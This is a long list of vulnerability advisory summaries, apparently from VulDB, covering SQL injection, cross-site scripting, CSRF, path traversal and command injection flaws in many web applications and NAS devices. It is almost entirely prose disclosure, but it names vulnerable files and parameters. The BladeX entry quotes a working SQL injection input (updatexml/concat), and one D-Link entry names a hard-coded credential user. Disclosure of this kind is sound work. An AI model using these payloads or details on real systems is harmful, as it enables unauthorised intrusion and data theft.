A vulnerability classified as problematic has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This affects an unknown part of the file admin/mod_reports/index.php. The manipulation of the argument end leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259461 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin/mod_settings/controller.php?action=add. The manipulation of the argument type leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259460.
A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/mod_users/controller.php?action=add. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259459.
A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. It has been classified as critical. Affected is an unknown function of the file admin/mod_users/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259458 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file admin/mod_reports/index.php. The manipulation of the argument categ/end leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259457 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/mod_comments/index.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259456.
A vulnerability, which was classified as critical, was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This affects an unknown part of the file admin/mod_roomtype/index.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259455.
A vulnerability, which was classified as critical, has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected by this issue is some unknown functionality of the file admin/mod_room/index.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259454 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259453 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. Affected is an unknown function of the file booking/index.php. The manipulation of the argument log_email/log_pword leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259452.
A vulnerability was found in SourceCodester Airline Ticket Reservation System 1.0. It has been rated as critical. This issue affects some unknown processing of the file activate_jet_details_form_handler.php. The manipulation of the argument jet_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259451.
A vulnerability was found in Byzoro Smart S80 up to 20240328. It has been declared as critical. This vulnerability affects unknown code of the file /log/webmailattach.php. The manipulation of the argument mail_file_path leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259450 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in SourceCodester eLearning System 1.0. This affects an unknown part of the component Maintenance Module. The manipulation of the argument Subject Code/Description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259389 was assigned to this vulnerability.
A vulnerability was found in SourceCodester eLearning System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument page leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-259388.
A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/category/view_category.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259387.
A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been classified as critical. Affected is an unknown function of the file classes/user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-259386 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Users.php. The manipulation leads to sql injection. The attack may be initiated remotely. The identifier VDB-259385 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259285 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability classified as problematic was found in ThingsBoard up to 3.6.2. This vulnerability affects unknown code of the component AdvancedFeature. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259282 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure and replied to be planning to fix this issue in version 3.7.
A vulnerability was found in SourceCodester Internship Portal Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/delete_activity.php. The manipulation of the argument activity_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259108.
A vulnerability was found in SourceCodester Internship Portal Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin/add_activity.php. The manipulation of the argument title/description/start/end leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259107.
A vulnerability was found in SourceCodester Internship Portal Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/edit_activity_query.php. The manipulation of the argument title/description/start/end leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259106 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Internship Portal Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/edit_activity.php. The manipulation of the argument activity_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259105 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Internship Portal Management System 1.0. Affected is an unknown function of the file admin/edit_admin_query.php. The manipulation of the argument username/password/name/admin_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259104.
A vulnerability, which was classified as critical, has been found in SourceCodester Internship Portal Management System 1.0. This issue affects some unknown processing of the file admin/edit_admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259103.
A vulnerability classified as critical was found in SourceCodester Internship Portal Management System 1.0. This vulnerability affects unknown code of the file admin/add_admin.php. The manipulation of the argument name/username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259102 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Internship Portal Management System 1.0. This affects an unknown part of the file admin/check_admin.php. The manipulation of the argument username/password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259101 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/?page=borrow/view_borrow. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259100.
A vulnerability was found in Panwei eoffice OA up to 9.5. It has been declared as critical. This vulnerability affects unknown code of the file /general/system/interface/theme_set/save_image.php of the component Backend. The manipulation of the argument image_type leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259072.
A vulnerability was found in Campcodes Online Patient Record Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/login.php. The manipulation of the argument password leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259071.
A vulnerability was found in SourceCodester PHP Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259070 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester PHP Task Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file task-details.php. The manipulation of the argument task_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259069 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester PHP Task Management System 1.0. Affected is an unknown function of the file admin-manage-user.php. The manipulation of the argument admin_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259068.
A vulnerability, which was classified as critical, has been found in SourceCodester PHP Task Management System 1.0. This issue affects some unknown processing of the file admin-password-change.php. The manipulation of the argument admin_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259067.
A vulnerability classified as critical was found in SourceCodester PHP Task Management System 1.0. This vulnerability affects unknown code of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259066 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Shibang Communications IP Network Intercom Broadcasting System 1.0. This affects an unknown part of the file /php/busyscreenshotpush.php. The manipulation of the argument jsondata[callee]/jsondata[imagename] leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259065 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in codelyfe Stupid Simple CMS 1.2.4. This issue affects some unknown processing of the component Login Page. The manipulation leads to improper restriction of excessive authentication attempts. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-259049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MailCleaner up to 2023.03.14. It has been classified as critical. This affects an unknown part of the component Admin Endpoints. The manipulation leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-262311.
A vulnerability was found in MailCleaner up to 2023.03.14 and classified as problematic. Affected by this issue is some unknown functionality of the component Log File Endpoint. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-262310 is the identifier assigned to this vulnerability.
A vulnerability has been found in MailCleaner up to 2023.03.14 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Admin Endpoints. The manipulation leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-262309 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in MailCleaner up to 2023.03.14. Affected is an unknown function of the component Admin Interface. The manipulation as part of Mail Message leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-262308.
A vulnerability, which was classified as critical, has been found in MailCleaner up to 2023.03.14. This issue affects some unknown processing of the component Email Handler. The manipulation leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-262307.
** DISPUTED ** A vulnerability, which was classified as problematic, was found in Intelbras MHDX 1004, MHDX 1008, MHDX 1016, MHDX 5016, HDCVI 1008 and HDCVI 1016 up to 20240401. This affects an unknown part of the file /cap.js of the component HTTP GET Request Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The identifier VDB-258933 was assigned to this vulnerability. NOTE: The vendor explains that they do not classify the information shown as sensitive and therefore there is no vulnerability which is about to harm the user.
A vulnerability, which was classified as problematic, was found in Bdtask Multi-Store Inventory Management System up to 20240325. Affected is an unknown function of the file /stockmovment/stockmovment/delete/ of the component Stock Movement Page. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258924. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in DedeCMS 5.7.112. This issue affects some unknown processing of the file dede/makehtml_archives_action.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258923. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in DedeCMS 5.7. This vulnerability affects unknown code of the file /src/dede/makehtml_map.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258922 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/makehtml_rss_action.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258921 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /src/dede/makehtml_js_action.php. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /src/dede/makehtml_spec.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeCMS 5.7. It has been classified as problematic. Affected is an unknown function of the file /src/dede/member_rank.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258918 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This issue affects some unknown processing of the component Setting Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-258917 was assigned to this vulnerability.
A vulnerability has been found in Clavister E10 and E80 up to 14.00.10 and classified as problematic. This vulnerability affects unknown code of the file /?Page=Node&amp;OBJ=/System/AdvancedSettings/DeviceSettings/MiscSettings of the component Misc Settings Page. The manipulation of the argument WatchdogTimerTime/BufFloodRebootTime/MaxPipeUsers/AVCache Lifetime/HTTPipeliningMaxReq/Reassembly MaxConnections/Reassembly MaxProcessingMem/ScrSaveTime leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 14.00.11 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-258916.
A vulnerability, which was classified as problematic, was found in SourceCodester Computer Laboratory Management System 1.0. This affects an unknown part of the file /classes/Users.php?f=save. The manipulation of the argument middlename leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258915.
** DISPUTED ** A vulnerability was found in francoisjacquet RosarioSIS 11.5.1. It has been rated as problematic. This issue affects some unknown processing of the component Add Portal Note. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-258911. NOTE: The vendor explains that the PDF is opened by the browser app in a sandbox, so no data from the website should be accessible.
A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_category. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258874 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Image Accordion Gallery App 1.0. It has been classified as critical. This affects an unknown part of the file /endpoint/add-image.php. The manipulation of the argument image_name leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258873 was assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in Replify-Messenger 1.0 on Android. This issue affects some unknown processing of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-258869 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: The vendor was contacted early and responded very quickly. He does not intend to maintain the app anymore and will revoke the availability in the Google Play Store.
A vulnerability classified as problematic was found in Zebra ZTC GK420d 1.0. This vulnerability affects unknown code of the file /settings of the component Alert Setup Page. The manipulation of the argument Address leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258868. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in fridgecow smartalarm 1.8.1 on Android. This affects an unknown part of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258867.
A vulnerability, which was classified as critical, has been found in Dreamer CMS up to 4.1.3. This issue affects some unknown processing of the component Attachment Handler. The manipulation leads to permission issues. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258779. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in YouDianCMS up to 9.5.12. This vulnerability affects unknown code of the file App\Lib\Action\Admin\ChannelAction.class.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. In the logic establishing these mappings, error handling was flawed, resulting in such mappings to potentially remain in place when they should have been removed again. Respective guests would then gain access to memory regions which they aren't supposed to have access to.
A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/search.php of the component Search Request Page. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258684.
A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/add-ambulance.php of the component Add Ambulance Page. The manipulation of the argument Ambulance Reg No/Driver Name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258683.
A vulnerability has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/manage-ambulance.php of the component Manage Ambulance Page. The manipulation of the argument del leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258682 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. This affects an unknown part of the file /admin/forgot-password.php of the component Forgot Password Page. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258681 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this issue is some unknown functionality of the file ambulance-tracking.php of the component Ambulance Tracking Page. The manipulation of the argument searchdata leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258680.
A vulnerability classified as problematic was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected by this vulnerability is an unknown functionality of the file ambulance-tracking.php of the component Ambulance Tracking Page. The manipulation of the argument searchdata leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258679.
A vulnerability classified as critical has been found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. Affected is an unknown function of the file /admin/login.php of the component Admin Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258678 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. It has been rated as problematic. This issue affects some unknown processing of the component Hire an Ambulance Page. The manipulation of the argument Patient Name/Relative Name/Relative Phone Number/City/State/Message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258677 was assigned to this vulnerability.
A vulnerability was found in Qdrant up to 1.6.1/1.7.4/1.8.2 and classified as critical. This issue affects some unknown processing of the file lib/collection/src/collection/snapshots.rs of the component Full Snapshot REST API. The manipulation leads to path traversal. Upgrading to version 1.8.3 is able to address this issue. The patch is named 3ab5172e9c8f14fa1f7b24e7147eac74e2412b62. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-258611.
A vulnerability was found in SourceCodester Simple Subscription Website 1.0 and classified as critical. This issue affects some unknown processing of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258431.
A vulnerability has been found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. This vulnerability affects unknown code of the file /protocol/log/listloginfo.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258430 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /admin/list_crl_conf. The manipulation of the argument CRLId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258429 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Shanghai Brad Technology BladeX 3.4.0. Affected is an unknown function of the file /api/blade-user/export-user of the component API. The manipulation with the input updatexml(1,concat(0x3f,md5(123456),0x3f),1)=1 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258426 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in SourceCodester Simple Subscription Website 1.0. Affected by this vulnerability is an unknown functionality of the file manage_plan.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258301 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Simple Subscription Website 1.0. Affected is an unknown function of the file Actions.php. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258300.
A vulnerability was found in FLIR AX8 up to 1.46.16. It has been rated as critical. This issue affects some unknown processing of the file /tools/test_login.php?action=register of the component User Registration. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258299. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in code-projects Online Book System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Product.php. The manipulation of the argument value leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-258206 is the identifier assigned to this vulnerability.
A vulnerability has been found in code-projects Online Book System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /cart.php. The manipulation of the argument quantity/remove leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258205 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in code-projects Online Book System 1.0. Affected is an unknown function of the file /description.php. The manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258204.
A vulnerability, which was classified as critical, has been found in code-projects Online Book System 1.0. This issue affects some unknown processing of the file /Product.php. The manipulation of the argument value leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258203.
A vulnerability classified as critical was found in code-projects Online Book System 1.0. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument username/password/login_username/login_password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258202 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Online Art Gallery Management System 1.0. This affects an unknown part of the file /admin/adminHome.php. The manipulation of the argument uname leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258201 was assigned to this vulnerability.
A vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Store Update Page. The manipulation of the argument Store Name/Store Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258200. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument Category Name/Model Name/Brand Name/Unit Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258199. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It has been classified as problematic. Affected is an unknown function of the component Page Title Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258198 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in NUUO Camera up to 20240319 and classified as problematic. This issue affects some unknown processing of the file /deletefile.php. The manipulation of the argument filename leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258197 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Campcodes Online Examination System 1.0. It has been classified as critical. Affected is an unknown function of the file /adminpanel/admin/facebox_modal/updateExaminee.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258036.
A vulnerability was found in Campcodes Online Examination System 1.0 and classified as critical. This issue affects some unknown processing of the file /adminpanel/admin/query/deleteCourseExe.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258035.
A vulnerability has been found in Campcodes Online Examination System 1.0 and classified as critical. This vulnerability affects unknown code of the file /adminpanel/admin/query/deleteExamExe.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258034 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Campcodes Online Examination System 1.0. This affects an unknown part of the file /adminpanel/admin/query/deleteQuestionExe.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258033 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Online Examination System 1.0. Affected by this issue is some unknown functionality of the file /adminpanel/admin/query/loginExe.php. The manipulation of the argument pass leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258032.
